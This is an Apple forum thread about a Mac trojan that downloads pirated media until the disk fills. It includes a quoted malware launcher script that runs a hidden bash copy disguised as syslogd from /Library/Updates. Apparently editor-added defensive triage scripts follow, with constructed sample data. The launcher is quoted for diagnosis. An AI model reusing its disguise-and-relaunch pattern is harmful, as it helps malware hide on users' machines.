
I have a trojan on my mac. The trojan downloads illegal content until my hard drive is full. How do I remove the trojan?

I noticed that my hard drive was getting full to the point that my computer had no space left. OmniDiskSweeper told me where all the data was. When I went to that folder I saw a TON of illegally downloaded content. I immediately trashed it to get my drive space back, but noticed something was downloading these files again. ClamAV did not find anything and Sophos has been running very slowly. Does anyone know what this is or how to remove it?

iMac, Mac OS X (10.6.8)

Posted on Aug 7, 2013 5:27 AM

Question marked as Best reply

Posted on Aug 7, 2013 5:31 AM

This sounds like you might have downloaded something and then authenticated and installed it.

Did you download something recently and subsequently started noticing this problem?

If so, the sure way to eliminate it would be to reinstall OS X after using Disk Utility to reformat the drive, perhaps doing a secure erase as well. I hope you've got a good backup of any files that you can't recreate easily.

53 replies

Aug 8, 2013 9:44 AM in response to Linc Davis

# Launcher script as posted by skier53091 (reformatted; comments added by the editor).
# The post is cut off after the $network_exec line; the closing "fi" lines at the
# end only close the if-blocks shown and were not part of the post.
network_dir="/Library/Updates/"
network_exec="./bash -x /usr/sbin/syslogd"   # "./bash" is a copy of bash inside $network_dir, not /bin/bash
network_pid=".apache"                        # hidden file in $network_dir that holds a PID

#### don't touch below here ####

cd $network_dir

# make sure filesystem isn't full
# (the odd quoting {'print $4'} still works: the shell joins it into {print $4})
freespace=`df -k . | tail -1 | awk {'print $4'}`

if [ $freespace -lt 10 ]; then
    echo "Filesystem Full!"

    # see if stale pid file
    if [ -f $network_pid ]; then
        pid=`cat $network_pid`
        # two lines from ps (header + entry) means the PID is still alive,
        # yet the script treats that case as "stale" and (re)launches
        if [ `ps -p $pid | wc -l` -eq 2 ]; then
            echo "Stale PID File"
            echo "Starting Network Address Translation Service..."
            $network_exec
        fi
    fi
fi

Aug 8, 2013 10:47 AM in response to skier53091

You've installed malware, a kind that I haven't heard of before. There's a sighting report here:


Malwr - Malware Analysis by Cuckoo Sandbox


As much as I'd like to know more about it, that would take up a lot of your time and it's not what you came for. The important thing for you is to get rid of it.


Note that your "anti-virus" software failed to detect the problem. That brings out the uselessness of such products. They don't protect you; all they do is slow down and destabilize your system. According to the site I linked above, none of the commercial anti-virus products detects this malware.


Since the malware seems to be previously unknown, there are no instructions for removing it. Do not rely on anyone's opinion about that. The only safe thing for you to do is to wipe your boot volume.


Back up all data to at least two different storage devices, if you haven't already done so. One backup is not enough to be safe. The backups can be made with Time Machine or with a mirroring tool such as "Carbon Copy Cloner." Preferably both.


Boot into Recovery mode, launch Disk Utility, and erase the startup volume with the default options. This operation will destroy all data on the volume, so you had better be sure of your backups. Quit Disk Utility and install OS X. When you reboot, you'll be prompted to go through the initial setup process. That's when you transfer the data from one of your backups.

Transfer only "Users" and "Settings" – not "Applications" or "Other files." Don't transfer the Guest account, if it was enabled on the old system. Test to make sure the problem is resolved.


You can then reinstall your third-party software from fresh downloads or known-good copies. Don't reinstall Sophos or anything that isn't either from the Mac App Store or from a well-known developer. Any software that you installed recently is suspect.


After reinstalling the software, test again.


Finally, change every password you have and check all your financial accounts for unauthorized transactions. Do this after your system has been secured, not before.

Aug 8, 2013 11:38 AM in response to Linc Davis

Thanks Linc. I was hoping I wouldn't have to do a reinstall, but it seems that this bug is uncommon.


If it helps you here's what I noticed with it.


It will download content, primarily illegal copies of movies and TV shows, until your hard drive is full.

It stores it in Macintosh HD/private/var/tmp/.tmp

It does not appear to be bold. By that I mean it rarely downloads while I am on the computer.


On another note, I have had it for a while now. I thought it was some other data on my disk taking up all the space (and it was to some degree) and didn't think much of my almost completely full hard drive. It was after I removed that extra data and magically saw the space disappear again that I became suspicious.


Thanks again.
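As an added example, not code from the thread or from any of its posters: a POSIX shell triage script that checks, under a given root, the three paths this thread actually names (the launcher's .apache PID file and its private copy of bash under /Library/Updates, and the hidden /private/var/tmp/.tmp download directory), reports their size and whether the stored PID is alive, and lists the largest entries under a directory with hidden ones included, which is what OmniDiskSweeper did for the poster. The ROOT argument is an assumption of mine so the same check can be run against a clone or backup made before wiping; the indicator list is only what the thread supports, so an empty result says nothing about other malware.

```shell
#!/bin/sh
# Added triage helper, not part of the original thread. Checks a filesystem
# root for the artefacts reported there: the launcher's PID file and private
# bash copy under /Library/Updates and the hidden download directory under
# /private/var/tmp. ROOT defaults to "/" (the live system); give it the mount
# point of a clone or backup to inspect it offline. Assumption: run as root so
# that all three locations are readable.

# Relative paths taken from the posted launcher script and the follow-up post.
INDICATORS="Library/Updates/.apache Library/Updates/bash private/var/tmp/.tmp"

# Print each indicator path that exists under ROOT, one per line (no output =
# none of these three paths present). Always exits 0 so it is safe under set -e.
found_indicators() {
    root="${1:-/}"
    for rel in $INDICATORS; do
        p="${root%/}/$rel"
        [ -e "$p" ] && echo "$p"
    done
    return 0
}

# Largest entries directly under DIR, hidden ones included, biggest first.
largest_under() {
    dir="$1"; n="${2:-10}"
    du -sk "$dir"/* "$dir"/.[!.]* 2>/dev/null | sort -rn | head -n "$n"
}

# Human-readable report: size of each hit, and whether the PID stored in
# .apache is still running (the launcher keys its relaunch off that check).
report_indicators() {
    root="${1:-/}"
    found_indicators "$root" | while IFS= read -r p; do
        if [ -d "$p" ]; then
            kb=$(du -sk "$p" | cut -f1)
            files=$(find "$p" -type f | wc -l | tr -d ' ')
            echo "HIT  $p  (directory, ${kb} KB in ${files} files)"
        else
            echo "HIT  $p  ($(wc -c < "$p" | tr -d ' ') bytes, owner $(ls -l "$p" | awk '{print $3":"$4}'))"
        fi
        case "$p" in
            */.apache)
                pid=$(tr -dc '0-9' < "$p")
                if [ -n "$pid" ] && ps -p "$pid" >/dev/null 2>&1; then
                    echo "     PID $pid from .apache is alive: $(ps -p "$pid" -o user=,comm=)"
                else
                    echo "     PID '${pid:-?}' from .apache is not running (stale, or already killed)"
                fi ;;
        esac
    done
    [ "$(found_indicators "$root" | wc -l)" -gt 0 ] || echo "none of the three thread indicators found under $root"
    echo "largest entries under ${root%/}/private/var/tmp:"
    largest_under "${root%/}/private/var/tmp" 5
    return 0
}

# Usage: sh sweep.sh /                (report on the live system)
#        sh sweep.sh /Volumes/Clone   (report on a mounted clone or backup)
# With no argument the functions are only defined, so the file can be sourced.
if [ -n "${1:-}" ]; then report_indicators "$1"; fi
```

Run it against the clone before the erase as well as against the live disk: the clone is the copy an analyst would want, and the report tells you whether the launcher's PID is still live before you power the machine down.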

Aug 8, 2013 12:00 PM in response to skier53091

skier53091 wrote:


I have had it for a while now.

Based on the sighting having been the end of May, I'm not surprised.


It would also be helpful if you could identify the process that is connecting from your computer. Activity monitor would tell you, but that might be too difficult to determine. LittleSnitch would probably have alerted you. The nettop Terminal command would probably reveal it, but it didn't come along until OS X 10.7. The only thing that I'm aware of that is similar is the WhoisConnected widget.


If you'd rather just get rid of it instead of spending more time with it, that's OK.

Aug 8, 2013 12:47 PM in response to skier53091

skier53091 wrote:


WhoisConnected is showing application unknown (other user)

74.125.228.118:443 EO:57870 TCP

17.254.32.16:80 EO:57873 TCP

The first is a Google site using https and the second Apple using http. You could look up the PID numbers 57870 & 57873 in Activity Monitor, but those should be familiar apps.

and

Bonjour

Listening *.5353 UDP IPV4/6

I think that's normal, but my WhoisConnected isn't working right now.

It also is showing Matlab, network time, running job, web process.

Matlab (matrix laboratory) appears to be a numerical computing environment and fourth-generation programming language. Developed by MathWorks. I'm not familiar with it.


Network Time and WebProcess are normal.


The responsible process may have shut down due to a full hard drive or your activity, as you speculated about earlier.
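Added example, not part of the thread: on 10.6.8 the process behind each connection can be read from lsof, which ships with the system (nettop does not). The functions below parse `lsof -nP -i` output into PID/user/command/peer lines, count connections per process, print the executable path behind a PID, and log periodic snapshots so a process that only talks while the machine is idle is still caught. The sample lsof output is constructed by me, not captured from the poster's Mac: it reuses the two addresses quoted above, puts the local ports 57870/57873 in the NAME column next to a made-up PID to show that port and PID are separate columns, and adds a fictitious root-owned bash talking to a documentation-range address as the kind of entry worth following up.

```shell
#!/bin/sh
# Added example, not from the thread: map the connections a widget like
# WhoisConnected shows back to the owning process with lsof. lsof prints the
# local port and the PID as separate columns, so the number after the colon
# in the peer column is never the PID.

# Reads `lsof -nP -i` output on stdin; prints one line per established TCP
# connection as "PID USER COMMAND LOCAL->REMOTE", sorted by PID.
# (lsof encodes spaces in command names as \x20, so column 2 is always the PID.)
summarize_lsof() {
    awk '$NF == "(ESTABLISHED)" && $(NF-1) ~ /->/ { print $2, $3, $1, $(NF-1) }' \
        | sort -n | uniq
}

# Same data, one line per process: "COUNT PID USER COMMAND", busiest first.
connections_per_process() {
    summarize_lsof | awk '{ k[$1" "$2" "$3]++ } END { for (p in k) print k[p], p }' | sort -rn
}

# Live snapshot of the current machine.
live_connections() { lsof -nP -i | summarize_lsof; }

# Executable path behind a PID: lsof's "txt" descriptor is the program text,
# which is how a look-alike living in /Library/Updates is told apart from the
# real /usr/sbin/syslogd. (Assumes lsof's -d txt, present on macOS and Linux.)
executable_for_pid() { lsof -p "$1" -d txt -Fn | sed -n 's/^n//p' | head -n 1; }

# The poster saw downloads mainly while away from the machine, so take a
# snapshot every INTERVAL seconds into LOG and review it later. Ctrl-C stops.
watch_connections() {
    interval="${1:-60}"; log="${2:-$HOME/netwatch.log}"
    while :; do
        { date; live_connections; echo; } >> "$log"
        sleep "$interval"
    done
}

# Constructed sample of `lsof -nP -i` output (not captured from the poster's
# Mac). Safari's two sockets use the addresses quoted in the thread; the
# local ports 57870/57873 sit in the NAME column while the PID is 1337. The
# root-owned bash on PID 2048 and the documentation-range peer 198.51.100.23
# are made up to show what an unexpected entry looks like.
SAMPLE_LSOF='COMMAND     PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
mDNSRespo    41 _mdnsresponder    8u  IPv4 0x1    0t0  UDP *:5353
Safari     1337 bob   22u  IPv4 0x2      0t0  TCP 192.168.1.5:57870->74.125.228.118:443 (ESTABLISHED)
Safari     1337 bob   23u  IPv4 0x3      0t0  TCP 192.168.1.5:57873->17.254.32.16:80 (ESTABLISHED)
bash       2048 root   4u  IPv4 0x4      0t0  TCP 192.168.1.5:61001->198.51.100.23:80 (ESTABLISHED)
syslogd      37 root   5u  IPv4 0x5      0t0  TCP *:514 (LISTEN)'

demo_summary() { printf '%s\n' "$SAMPLE_LSOF" | summarize_lsof; }
demo_per_process() { printf '%s\n' "$SAMPLE_LSOF" | connections_per_process; }

# Running the file directly prints the parsed sample; on the suspect Mac use
# live_connections, then executable_for_pid <PID> on anything unfamiliar.
demo_summary
```

In the sample the entry to chase is the root-owned bash on PID 2048: `executable_for_pid 2048` would show which bash binary that is, and `watch_connections 60` left running overnight would show whether it talks only when the machine is idle.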

Aug 8, 2013 4:20 PM in response to Linc Davis

Linc Davis wrote:

Don't reinstall Sophos or anything that isn't either from the Mac App Store or from a well-known developer.

Any particular reason you have for the recommendation to not reinstall Sophos?


I have used it for years & never had any issues with it -- not even when upgrading the OS. It has not slowed down any of my Macs, not even the oldest & least powerful of them, caused any instabilities, or anything else.


What it has done is alert me to Windows malware in emails from friends & associates. While those things can't affect my Mac, this tells me the PC's of those people are infected, potentially compromising any data on their machines, including data about me & my family. I contact them when this happens so we can figure out the extent of the breach & take the appropriate action.


That's reason enough for me to run Sophos!

Aug 8, 2013 4:32 PM in response to skier53091

Although I do respect Linc's opinion, I'm not yet convinced that he's right that this is malware. The mere fact that someone submitted it to malwr and VirusTotal does not prove that it's malware... especially since it was submitted in May but still is not detected as malware by any anti-virus apps.


That said, the code that you posted that led Linc to say it's malware certainly does look suspicious. It relies on additional files that don't exist normally, with names matching existing OS X services. That's sneaky, and sneaky is bad. So, though I'm not convinced it's absolutely necessary, it would still be the prudent thing to wipe your hard drive and reinstall from scratch.


I will contact a few folks at some anti-virus companies about this, and see what input they may have about it. If you would be willing to work with some of those folks on determining the cause, it would be very helpful if you could clone your current, potentially infected, system to an external hard drive before erasing the internal hard drive. That would preserve the current state for later analysis, as well as providing you with an additional backup. You can use either Carbon Copy Cloner or SuperDuper for that task.

Aug 9, 2013 8:55 AM in response to R C-R

Sophos is a perfectly valid and reputable security software suite, that outperforms a number of others in the detection and management of malicious and suspect files. The use of AV software is also a perfectly legitimate and usable means for the average user to help root out potentially suspicious files they may have encountered.


...but if you want to limit your uses to the Mac App Store, then go ahead and install iAntivirus from the store, which has a couple of decent drawbacks over Sophos and others, primarily because Apple's policies for apps in the store limit their abilities, not only in keeping updated in a timely manner but also in the scope of what they can do for the user.

Aug 9, 2013 11:51 AM in response to skier53091

If you haven't wiped your system yet, I'd be curious as to what is in the file at the following path:


/Library/Updates/.apache


This looks like it should be the real meat of the script. If you could, please execute the following command in the Terminal, then post the output here:


more /Library/Updates/.apache | open -f -a textedit


This should show us the code that is being executed by the script you posted in response to Linc yesterday.
